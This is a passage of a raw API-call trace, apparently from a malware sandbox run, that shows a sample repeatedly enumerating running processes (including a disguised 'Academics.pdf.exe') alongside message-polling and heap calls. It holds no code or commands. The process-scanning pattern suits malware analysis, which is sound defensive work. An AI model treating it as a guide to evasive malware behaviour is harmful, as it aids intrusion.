th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0300.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0300.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0300.323] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0300.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0300.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0300.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0300.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0300.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0300.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0300.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0300.328] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0300.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0300.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0300.330] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0300.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0300.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0300.332] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0300.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0300.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0300.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0300.337] CloseHandle (hObject=0x294) returned 1 [0300.337] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.337] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.339] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0300.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0300.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0300.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0300.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0300.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0300.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0300.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0300.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0300.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0300.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0300.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0300.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0300.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0300.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0300.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0300.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0300.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0300.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0300.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0300.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0300.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0300.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0300.379] CloseHandle (hObject=0x294) returned 1 [0300.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.381] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, 